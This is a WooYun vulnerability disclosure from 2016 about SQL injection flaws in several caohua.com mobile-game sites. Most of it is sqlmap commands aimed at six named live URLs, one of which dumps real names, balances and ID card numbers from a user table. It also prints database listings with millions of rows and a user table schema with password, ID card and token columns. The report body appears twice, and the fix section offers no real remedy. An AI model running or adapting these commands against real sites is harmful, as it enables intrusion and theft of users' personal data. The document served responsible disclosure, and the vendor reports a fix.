当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0184694

漏洞标题:游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

相关厂商:caohua.com

漏洞作者: 黑色键盘丶

提交时间:2016-04-09 13:33

修复时间:2016-05-24 14:30

公开时间:2016-05-24 14:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

简要描述:

RT

详细说明:

分站POST注入:E:\sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__ha
sh__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMF
rewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=8895263
4&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Da
ta_UserAccount -C "RealName,CountMoney,IDCard" --dump


----------------------------------

主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db


----------------------------

主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634"
--dbs


-------------------------------

E:\sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea
t&UserName=" --dbs


------------------------------

E:\sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m=
GetQuery&uid=1" --dbs


-----------------------------

E:\sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx
?Content=" --dbs


10个裤 都可以查询

XJS2CEXUIML`{@C7}[%L0(2.png


数据库:MobPlatform

Database: MobPlatform
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.Data_ProDownLoad | 6415950 |
| dbo.Data_CallBackError | 6067433 |
| dbo.Data_ProCPA | 5775310 |
| dbo.Data_ProductUsers | 5586541 |
| dbo.ExtData_SourcePlanTotalCount | 1663380 |
| dbo.Data_UserAccount | 1388708 |
| dbo.ExtData_UserPlanTotalCount | 1333119 |
| dbo.Data_ProductOrder | 1230833 |
| dbo.Data_ProCPS | 1151720 |
| dbo.Data_ProductGift | 1107720 |
| dbo.ExtData_SourceTotalCount | 1070893 |
| dbo.Data_SourcePlanTotalCount | 976886 |
| dbo.Data_ProLogin | 840158 |
| dbo.Data_UserPlanTotalCount | 654747 |
| dbo.ExtData_PlanTotalCount | 587222 |
| dbo.ExtData_ProductTotalCount | 485816 |
| dbo.Data_PlanTotalCount | 323250 |
| dbo.Data_SourceTotalCount | 145167 |
| dbo.Data_UserTotalCount | 84706 |
| dbo.Base_SourceAPKInfo | 52370 |
| dbo.Data_UserPayOrder | 33938 |
| dbo.Data_ProductTotalCount | 26426 |
| dbo.Base_Server | 18644 |
| dbo.Base_UserAdvertPlan | 14106 |
| dbo.Data_GiftCheck | 10178 |
| dbo.Data_SourceMoneyToMember | 9592 |
| dbo.Data_UserBillRecords | 6312 |
| dbo.Base_SourceAdvertPlan | 5660 |
| dbo.MS_Menu_Role | 3902 |
| dbo.Data_UserSecret | 3583 |
| dbo.PS_SiteData | 3523 |
| dbo.Base_DrawOrders | 3448 |
| dbo.Base_UserSource | 2614 |
| dbo.Base_UserAccount | 2232 |
| dbo.Base_UserInfo | 2214 |
| dbo.Base_UserPersonal | 1162 |
| dbo.Data_MSDKPayOrders | 1118 |
| dbo.Base_UserBankInfo | 1044 |
| dbo.Base_ProductGift | 513 |
| dbo.Base_SourceHtml | 469 |
| dbo.Base_UserCompany | 382 |
| dbo.PS_Mixed | 309 |
| dbo.Base_AdvertPlan | 227 |
| dbo.MSreplication_objects | 219 |
| dbo.Data_SourceChargeApply | 175 |
| dbo.Base_ProductInfo | 169 |
| dbo.MS_Manager_Role | 89 |
| dbo.MS_Manager_Role | 89 |
| dbo.BBS_Topic | 57 |
| dbo.PS_ArticleClass | 53 |
| dbo.PS_ArticleClass | 53 |
| dbo.MS_Role | 48 |
| dbo.Data_UserMoneyInsertPost | 44 |
| dbo.PS_AdsClass | 23 |
| dbo.PS_AdsClass | 23 |
| dbo.MS_Dept | 18 |
| dbo.PS_Payment | 16 |
| dbo.Base_Corner | 14 |
| dbo.Base_ProductArticle | 7 |
| dbo.SDK_Class | 5 |
| dbo.Base_PackServer | 4 |
| dbo.Data_ArticleClass | 2 |
| dbo.Data_ProductInfo | 2 |
| dbo.CN_Menu | 1 |
| dbo.MS_Config | 1 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
+----------------------------------+---------+


数据库:MobUsers_DB

Database: MobUsers_DB
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.Data_UserAccount | 5701357 |
+----------------------+---------+


数据库:MobGame_DB

Database: MobGame_DB
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.Re_OldUser | 4916892 |
| dbo.Ur_WalletLog | 2647587 |
| dbo.Ur_DoWork | 1610735 |
| dbo.SC_GetLog | 1497556 |
| dbo.SC_TaskLog | 1497556 |
| dbo.Us_Info | 1374572 |
| dbo.Ge_GiftCode | 1002609 |
| dbo.Ge_GiftCode | 1002609 |
| dbo.Data_CallBackError | 632818 |
| dbo.AC_Player | 316155 |
| dbo.CH_SignLog | 243104 |
| dbo.AC_FinshRole | 236807 |
| dbo.Or_PayOrder | 182786 |
| dbo.Or_GameOrder | 161090 |
| dbo.CH_RewardLog | 52355 |
| dbo.SG_SignLog | 49922 |
| dbo.HP_Integral | 38682 |
| dbo.CH_Player | 32054 |
| dbo.NY_SignLog | 30008 |
| dbo.SI_Info | 27695 |
| dbo.HP_ISDonate | 26467 |
| dbo.CH_GetLog | 23399 |
| dbo.SG_GetLog | 22206 |
| dbo.HL_GetLog | 19799 |
| dbo.HL_DrawLog | 19014 |
| dbo.CH_Order | 15963 |
| dbo.NY_Blessing | 13916 |
| dbo.SI_Player | 13011 |
| dbo.SK_GrabLog | 12175 |
| dbo.SI_GiftLog | 10525 |
| dbo.NY_Player | 9888 |
| dbo.SG_Player | 9452 |
| dbo.RP_GetLog | 8559 |
| dbo.AC_Receive | 7889 |
| dbo.AC_Rotary | 7889 |
| dbo.RP_Player | 5868 |
| dbo.SK_GetLog | 5501 |
| dbo.NY_PayOrder | 4339 |
| dbo.SK_Player | 3954 |
| dbo.PS_SiteData | 3523 |
| dbo.Us_Wallet | 3511 |
| dbo.MK_Order | 3246 |
| dbo.HL_Player | 2916 |
| dbo.Re_Order | 2681 |
| dbo.SI_UserRole | 2550 |
| dbo.NY_ClockLog | 2089 |
| dbo.RP_Order | 1933 |
| dbo.MS_Menu_Role | 1915 |
| dbo.MK_GetLog | 1854 |
| dbo.HL_ExchangeGiftCode | 1804 |
| dbo.HL_ExchangeGiftCode | 1804 |
| dbo.MK_Player | 988 |
| dbo.MSreplication_objects | 303 |
| dbo.Ge_Info | 119 |
| dbo.SK_Gift | 96 |
| dbo.Ur_Work | 92 |
| dbo.PM_Order | 71 |
| dbo.MS_Manager_Role | 42 |
| dbo.MS_Manager_Role | 42 |
| dbo.SC_PlayerPlace | 34 |
| dbo.SC_PlayerPlace | 34 |
| dbo.PS_ArticleClass | 22 |
| dbo.PS_ArticleClass | 22 |
| dbo.PS_AdsClass | 19 |
| dbo.PS_AdsClass | 19 |
| dbo.PS_Mixed | 18 |
| dbo.AC_Prize | 17 |
| dbo.SG_Gift | 15 |
| dbo.SK_TimeField | 15 |
| dbo.HL_Gift | 13 |
| dbo.MS_Role | 12 |
| dbo.SC_Scratch | 11 |
| dbo.AC_Gift | 10 |
| dbo.CH_Gift | 10 |
| dbo.MR_Rank | 10 |
| dbo.PS_Payment | 10 |
| dbo.SI_Gitf | 10 |
| dbo.MK_Rebate | 8 |
| dbo.RP_Gift | 8 |
| dbo.SC_Gift | 8 |
| dbo.System_Configs | 8 |
| dbo.MS_Dept | 7 |
| dbo.NY_Gift | 7 |
| dbo.PM_Product | 5 |
| dbo.Ms_Config | 4 |
| dbo.Re_Info | 4 |
| dbo.SK_Seckill | 4 |
| dbo.Data_Discount | 3 |
| dbo.AC_Role | 2 |
| dbo.HL_Turntable | 2 |
| dbo.RP_TimeField | 2 |
| dbo.SG_Role | 2 |
| dbo.CH_Role | 1 |
| dbo.HP_Donate | 1 |
| dbo.MK_Role | 1 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
| dbo.NY_NewYear | 1 |
| dbo.RP_RedPackets | 1 |
| dbo.SI_Role | 1 |
+---------------------------------+---------+


这个裤还有可以整出论坛的

Database: MobGame_DB
Table: Us_Info
[19 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| Active | int |
| AddDateTime | datetime |
| BBSPwd | varchar |
| Birthday | datetime |
| Email | varchar |
| GiveMoney | decimal |
| IDCard | varchar |
| Install | int |
| LoginName | varchar |
| NickName | varchar |
| Password | varchar |
| Pay | decimal |
| QQ | varchar |
| Rank_ID | int |
| RealName | varchar |
| Status | char |
| Tel | varchar |
| Token | varchar |
| UpdateDateTime | datetime |
+----------------+----------+


跑了几个数据量大的 还有几个就不一一演示了

漏洞证明:

分站POST注入:E:\sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__ha
sh__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMF
rewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=8895263
4&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Da
ta_UserAccount -C "RealName,CountMoney,IDCard" --dump


----------------------------------

主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db


----------------------------

主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634"
--dbs


-------------------------------

E:\sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea
t&UserName=" --dbs


------------------------------

E:\sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m=
GetQuery&uid=1" --dbs


-----------------------------

E:\sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx
?Content=" --dbs


10个裤 都可以查询

XJS2CEXUIML`{@C7}[%L0(2.png


数据库:MobPlatform

Database: MobPlatform
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.Data_ProDownLoad | 6415950 |
| dbo.Data_CallBackError | 6067433 |
| dbo.Data_ProCPA | 5775310 |
| dbo.Data_ProductUsers | 5586541 |
| dbo.ExtData_SourcePlanTotalCount | 1663380 |
| dbo.Data_UserAccount | 1388708 |
| dbo.ExtData_UserPlanTotalCount | 1333119 |
| dbo.Data_ProductOrder | 1230833 |
| dbo.Data_ProCPS | 1151720 |
| dbo.Data_ProductGift | 1107720 |
| dbo.ExtData_SourceTotalCount | 1070893 |
| dbo.Data_SourcePlanTotalCount | 976886 |
| dbo.Data_ProLogin | 840158 |
| dbo.Data_UserPlanTotalCount | 654747 |
| dbo.ExtData_PlanTotalCount | 587222 |
| dbo.ExtData_ProductTotalCount | 485816 |
| dbo.Data_PlanTotalCount | 323250 |
| dbo.Data_SourceTotalCount | 145167 |
| dbo.Data_UserTotalCount | 84706 |
| dbo.Base_SourceAPKInfo | 52370 |
| dbo.Data_UserPayOrder | 33938 |
| dbo.Data_ProductTotalCount | 26426 |
| dbo.Base_Server | 18644 |
| dbo.Base_UserAdvertPlan | 14106 |
| dbo.Data_GiftCheck | 10178 |
| dbo.Data_SourceMoneyToMember | 9592 |
| dbo.Data_UserBillRecords | 6312 |
| dbo.Base_SourceAdvertPlan | 5660 |
| dbo.MS_Menu_Role | 3902 |
| dbo.Data_UserSecret | 3583 |
| dbo.PS_SiteData | 3523 |
| dbo.Base_DrawOrders | 3448 |
| dbo.Base_UserSource | 2614 |
| dbo.Base_UserAccount | 2232 |
| dbo.Base_UserInfo | 2214 |
| dbo.Base_UserPersonal | 1162 |
| dbo.Data_MSDKPayOrders | 1118 |
| dbo.Base_UserBankInfo | 1044 |
| dbo.Base_ProductGift | 513 |
| dbo.Base_SourceHtml | 469 |
| dbo.Base_UserCompany | 382 |
| dbo.PS_Mixed | 309 |
| dbo.Base_AdvertPlan | 227 |
| dbo.MSreplication_objects | 219 |
| dbo.Data_SourceChargeApply | 175 |
| dbo.Base_ProductInfo | 169 |
| dbo.MS_Manager_Role | 89 |
| dbo.MS_Manager_Role | 89 |
| dbo.BBS_Topic | 57 |
| dbo.PS_ArticleClass | 53 |
| dbo.PS_ArticleClass | 53 |
| dbo.MS_Role | 48 |
| dbo.Data_UserMoneyInsertPost | 44 |
| dbo.PS_AdsClass | 23 |
| dbo.PS_AdsClass | 23 |
| dbo.MS_Dept | 18 |
| dbo.PS_Payment | 16 |
| dbo.Base_Corner | 14 |
| dbo.Base_ProductArticle | 7 |
| dbo.SDK_Class | 5 |
| dbo.Base_PackServer | 4 |
| dbo.Data_ArticleClass | 2 |
| dbo.Data_ProductInfo | 2 |
| dbo.CN_Menu | 1 |
| dbo.MS_Config | 1 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
+----------------------------------+---------+


数据库:MobUsers_DB

Database: MobUsers_DB
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.Data_UserAccount | 5701357 |
+----------------------+---------+


数据库:MobGame_DB

Database: MobGame_DB
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.Re_OldUser | 4916892 |
| dbo.Ur_WalletLog | 2647587 |
| dbo.Ur_DoWork | 1610735 |
| dbo.SC_GetLog | 1497556 |
| dbo.SC_TaskLog | 1497556 |
| dbo.Us_Info | 1374572 |
| dbo.Ge_GiftCode | 1002609 |
| dbo.Ge_GiftCode | 1002609 |
| dbo.Data_CallBackError | 632818 |
| dbo.AC_Player | 316155 |
| dbo.CH_SignLog | 243104 |
| dbo.AC_FinshRole | 236807 |
| dbo.Or_PayOrder | 182786 |
| dbo.Or_GameOrder | 161090 |
| dbo.CH_RewardLog | 52355 |
| dbo.SG_SignLog | 49922 |
| dbo.HP_Integral | 38682 |
| dbo.CH_Player | 32054 |
| dbo.NY_SignLog | 30008 |
| dbo.SI_Info | 27695 |
| dbo.HP_ISDonate | 26467 |
| dbo.CH_GetLog | 23399 |
| dbo.SG_GetLog | 22206 |
| dbo.HL_GetLog | 19799 |
| dbo.HL_DrawLog | 19014 |
| dbo.CH_Order | 15963 |
| dbo.NY_Blessing | 13916 |
| dbo.SI_Player | 13011 |
| dbo.SK_GrabLog | 12175 |
| dbo.SI_GiftLog | 10525 |
| dbo.NY_Player | 9888 |
| dbo.SG_Player | 9452 |
| dbo.RP_GetLog | 8559 |
| dbo.AC_Receive | 7889 |
| dbo.AC_Rotary | 7889 |
| dbo.RP_Player | 5868 |
| dbo.SK_GetLog | 5501 |
| dbo.NY_PayOrder | 4339 |
| dbo.SK_Player | 3954 |
| dbo.PS_SiteData | 3523 |
| dbo.Us_Wallet | 3511 |
| dbo.MK_Order | 3246 |
| dbo.HL_Player | 2916 |
| dbo.Re_Order | 2681 |
| dbo.SI_UserRole | 2550 |
| dbo.NY_ClockLog | 2089 |
| dbo.RP_Order | 1933 |
| dbo.MS_Menu_Role | 1915 |
| dbo.MK_GetLog | 1854 |
| dbo.HL_ExchangeGiftCode | 1804 |
| dbo.HL_ExchangeGiftCode | 1804 |
| dbo.MK_Player | 988 |
| dbo.MSreplication_objects | 303 |
| dbo.Ge_Info | 119 |
| dbo.SK_Gift | 96 |
| dbo.Ur_Work | 92 |
| dbo.PM_Order | 71 |
| dbo.MS_Manager_Role | 42 |
| dbo.MS_Manager_Role | 42 |
| dbo.SC_PlayerPlace | 34 |
| dbo.SC_PlayerPlace | 34 |
| dbo.PS_ArticleClass | 22 |
| dbo.PS_ArticleClass | 22 |
| dbo.PS_AdsClass | 19 |
| dbo.PS_AdsClass | 19 |
| dbo.PS_Mixed | 18 |
| dbo.AC_Prize | 17 |
| dbo.SG_Gift | 15 |
| dbo.SK_TimeField | 15 |
| dbo.HL_Gift | 13 |
| dbo.MS_Role | 12 |
| dbo.SC_Scratch | 11 |
| dbo.AC_Gift | 10 |
| dbo.CH_Gift | 10 |
| dbo.MR_Rank | 10 |
| dbo.PS_Payment | 10 |
| dbo.SI_Gitf | 10 |
| dbo.MK_Rebate | 8 |
| dbo.RP_Gift | 8 |
| dbo.SC_Gift | 8 |
| dbo.System_Configs | 8 |
| dbo.MS_Dept | 7 |
| dbo.NY_Gift | 7 |
| dbo.PM_Product | 5 |
| dbo.Ms_Config | 4 |
| dbo.Re_Info | 4 |
| dbo.SK_Seckill | 4 |
| dbo.Data_Discount | 3 |
| dbo.AC_Role | 2 |
| dbo.HL_Turntable | 2 |
| dbo.RP_TimeField | 2 |
| dbo.SG_Role | 2 |
| dbo.CH_Role | 1 |
| dbo.HP_Donate | 1 |
| dbo.MK_Role | 1 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
| dbo.NY_NewYear | 1 |
| dbo.RP_RedPackets | 1 |
| dbo.SI_Role | 1 |
+---------------------------------+---------+


这个裤还有可以整出论坛的

Database: MobGame_DB
Table: Us_Info
[19 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| Active | int |
| AddDateTime | datetime |
| BBSPwd | varchar |
| Birthday | datetime |
| Email | varchar |
| GiveMoney | decimal |
| IDCard | varchar |
| Install | int |
| LoginName | varchar |
| NickName | varchar |
| Password | varchar |
| Pay | decimal |
| QQ | varchar |
| Rank_ID | int |
| RealName | varchar |
| Status | char |
| Tel | varchar |
| Token | varchar |
| UpdateDateTime | datetime |
+----------------+----------+


跑了几个数据量大的 还有几个就不一一演示了

修复方案:

你懂的

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-09 14:20

厂商回复:

数据库可跨库查询,信息泄露

最新状态:

2016-05-06:已修复


漏洞评价:

评价

  1. 2016-04-09 11:57 | 黑色键盘丶 ( 普通白帽子 | Rank:1527 漏洞数:310 | 哥,是孤独风中的一匹狼)

    游戏厂商都送礼了 嘻嘻 不知道这个有没有

  2. 2016-04-09 17:41 | Exploit DB ( 普通白帽子 | Rank:475 漏洞数:132 | 水能载舟,亦可覆舟)

    @黑色键盘丶 大胸弟 是两个GET一个POST吗

  3. 2016-04-09 17:45 | Exploit DB ( 普通白帽子 | Rank:475 漏洞数:132 | 水能载舟,亦可覆舟)

    @黑色键盘丶 三处GET

  4. 2016-04-09 17:46 | 黑色键盘丶 ( 普通白帽子 | Rank:1527 漏洞数:310 | 哥,是孤独风中的一匹狼)

    @Exploit DB 我提交了6处

  5. 2016-04-09 17:48 | Exploit DB ( 普通白帽子 | Rank:475 漏洞数:132 | 水能载舟,亦可覆舟)

    @黑色键盘丶 留个qq交流一下。 我这初步测试发现了四处 你说我六处是指同一个网站下有不同参数的注入还是不同的网站? 就是子域名。

  6. 2016-04-09 18:33 | 黑色键盘丶 ( 普通白帽子 | Rank:1527 漏洞数:310 | 哥,是孤独风中的一匹狼)

    @Exploit DB 1